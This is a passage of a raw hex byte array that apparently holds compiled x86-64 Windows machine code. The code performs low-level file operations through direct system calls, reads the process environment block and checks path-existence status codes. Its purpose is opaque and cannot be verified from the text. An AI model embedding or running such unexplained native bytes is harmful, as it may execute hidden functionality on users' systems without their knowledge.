00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0x01,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x85,0xD0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x83,0xBD,0x00,0x02,0x00,0x00,0x00,0x0F,0x84,0x79,0x02,0x00,0x00,0x48,0x8B,0x95,0x00,0x02,0x00,0x00,0x48,0x8D,0x45,0xB0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF7,0xA0,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x8D,0x95,0xC8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE0,0x56,0x00,0x00,0x89,0x85,0xD8,0x01,0x00,0x00,0x81,0xBD,0xD8,0x01,0x00,0x00,0x1A,0x00,0x00,0x80,0x75,0x2D,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x89,0xC2,0x48,0x8D,0x05,0x48,0xC4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0xF7,0xFF,0xFF,0x48,0x8D,0x05,0x18,0xC4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x41,0xF7,0xFF,0xFF,0xE9,0xFC,0x01,0x00,0x00,0x83,0xBD,0xD8,0x01,0x00,0x00,0x00,0x0F,0x88,0xEB,0x01,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x8D,0x8D,0xBC,0x01,0x00,0x00,0x48,0x8D,0x95,0xC0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x91,0x10,0x00,0x00,0x89,0x85,0xDC,0x01,0x00,0x00,0x83,0xBD,0xDC,0x01,0x00,0x00,0x00,0x0F,0x84,0x9D,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x63,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x84,0x01,0x00,0x00,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x26,0xA0,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x10,0x42,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x14,0x42,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0x31,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x42,0xA0,0x00,0x00,0x48,0x83,0xC0,0x02,0x48,0x89,0x85,0xD0,0x01,0x00,0x00,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x85,0xD0,0x01,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x62,0x42,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x4E,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x85,0x9F,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x6F,0x41,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x73,0x41,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6E,0x10,0x00,0x00,0x48,0x8B,0x95,0x08,0x02,0x00,0x00,0x89,0x02,0x90,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0x8B,0x00,0x85,0xC0,0x0F,0x84,0x83,0x00,0x00,0x00,0xEB,0x6F,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x0B,0xFE,0xFF,0xFF,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFB,0x9E,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0xE5,0x40,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE9,0x40,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xB8,0xFD,0xFF,0xFF,0x90,0xE9,0xB2,0xFD,0xFF,0xFF,0x90,0xE9,0xAC,0xFD,0xFF,0xFF,0xC7,0x85,0xDC,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3B,0x55,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x5A,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x4E,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x56,0x9E,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x40,0x40,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x44,0x40,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0xDC,0x01,0x00,0x00,0x48,0x81,0xC4,0x60,0x02,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x10,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x38,0xC2,0x75,0x16,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x3C,0x5C,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x5B,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x00,0x83,0xC8,0x20,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x60,0x7E,0x06,0x80,0x7D,0xFF,0x7A,0x7E,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3B,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x3A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x20,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x02,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x5C,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x81,0xEC,0x30,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xC0,0x01,0x00,0x00,0x48,0x89,0x95,0xC8,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x8D,0x15,0xEF,0xC0,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9F,0x9D,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1A,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x21,0xE8,0xAF,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x63,0x9D,0x00,0x00,0x48,0x8B,0x95,0xC8,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDA,0x9C,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x48,0x8D,0x55,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2D,0x9D,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x45,0x99,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x10,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x8D,0x14,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x10,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x8D,0x50,0x02,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x50,0x02,0x90,0x48,0x81,0xC4,0x30,0x02,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC0,0x20,0x48,0x8B,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x40,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x8B,0x45,0x20,0x48,0x89,0x45,0xA8,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x40,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x4C,0x8D,0x45,0xB0,0x48,0x8D,0x4D,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x05,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x55,0xA8,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x16,0x01,0x12,0x00,0x48,0x89,0xC1,0xE8,0x89,0x54,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x3A,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xFC,0x33,0x00,0x00,0xC0,0x75,0x37,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x83,0xC0,0x08,0x48,0x89,0xC2,0x48,0x8D,0x05,0xFB,0xBE,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD9,0xF1,0xFF,0xFF,0x48,0x8D,0x05,0xA1,0xBE,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCA,0xF1,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xE9,0xDB,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x79,0x37,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x83,0xC0,0x08,0x48,0x89,0xC2,0x48,0x8D,0x05,0xD9,0xBE,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9C,0xF1,0xFF,0xFF,0x48,0x8D,0x05,0x64,0xBE,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8D,0xF1,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9E,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x8B,0x55,0x20,0x89,0x54,0x24,0x30,0x48,0x8B,0x55,0x18,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x55,0xB0,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x12,0x54,0x00,0x00,0x89,0x45,0xFC,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x42,0x51,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x79,0x34,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x83,0xC0,0x08,0x48,0x89,0xC2,0x48,0x8D,0x05,0x3D,0xBE,0x00,0x00,0x48,0x89,0xC1,0xE8,0x00,0xF1,0xFF,0xFF,0x48,0x8D,0x05,0xC8,0xBD,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF1,0xF0,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x40,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xB0,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x03,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0xAB,0x52,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x3A,0x00,0x00,0xC0,0x74,0x12,0x81,0x7D,0xFC,0x33,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xFC,0x3B,0x00,0x00,0xC0,0x75,0x34,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x83,0xC0,0x08,0x48,0x89,0xC2,0x48,0x8D,0x05,0x14,0xBD,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF2,0xEF,0xFF,0xFF,0x48,0x8D,0x05,0xBA,0xBC,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE3,0xEF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x19,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xD9,0x4F,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xB0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x88,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x20,0x02,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0xC0,0x01,0x00,0x00,0x0F,0x11,0x85,0xD0,0x01,0x00,0x00,0x0F,0x11,0x85,0xE0,0x01,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xB0,0x48,0x89,0x45,0xA8,0x48,0x83,0xBD,0x20,0x02,0x00,0x00,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x7D,0x48,0x8B,0x95,0x20,0x02,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC1,0xE8,0x17,0xFB,0xFF,0xFF,0xC7,0x85,0xC0,0x01,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0x01,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0x85,0xD0,0x01,0x00,0x00,0x48,0xC7,0x85,0xE0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xE8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC1,0x53,0x00,0x00,0x89,0x85,0xFC,0x01,0x00,0x00,0x83,0xBD,0xFC,0x01,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0x88,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x02,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x10,0x02,0x00,0x00,0x0F,0x11,0x85,0x20,0x02,0x00,0x00,0x0F,0x11,0x85,0x30,0x02,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x48,0x89,0x45,0xE8,0x48,0x83,0xBD,0x70,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x13,0x01,0x00,0x00,0x48,0x8B,0x95,0x70,0x02,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xFE,0xF9,0xFF,0xFF,0xC7,0x85,0x10,0x02,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x28,0x02,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x8D,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0x10,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0xEB,0x4F,0x00,0x00,0x89,0x85,0x4C,0x02,0x00,0x00,0x81,0xBD,0x4C,0x02,0x00,0x00,0x43,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x42,0x81,0xBD,0x4C,0x02,0x00,0x00,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x83,0xBD,0x4C,0x02,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x39,0x4D,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xD8,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x02,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x10,0x02,0x00,0x00,0x0F,0x11,0x85,0x20,0x02,0x00,0x00,0x0F,0x11,0x85,0x30,0x02,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x95,0x70,0x02,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0x63,0xF8,0xFF,0xFF,0xC7,0x85,0x10,0x02,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x28,0x02,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x8D,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0x10,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0x50,0x4E,0x00,0x00,0x89,0x85,0x4C,0x02,0x00,0x00,0x81,0xBD,0x4C,0x02,0x00,0x00,0x35,0x00,0x00,0xC0,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x42,0x81,0xBD,0x4C,0x02,0x00,0x00,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x83,0xBD,0x4C,0x02,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9E,0x4B,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xD8,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x41,0xB9,0x10,0x00,0x00,0x00,0x49,0x89,0xC0,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xB4,0x50,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xAD,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x0F,0x83,0x45,0xF4,0x01,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xEA,0x8B,0x45,0xF4,0x83,0xE8,0x01,0x89,0x45,0xF0,0xEB,0x73,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0x8B,0x45,0xF0,0x89,0x45,0xEC,0xEB,0x0B,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x8B,0x45,0xEC,0x8D,0x50,0xFF,0x89,0x55,0xEC,0x85,0xC0,0x75,0xE8,0x48,0x83,0x7D,0xF8,0x00,0x74,0x40,0x8B,0x55,0x18,0x4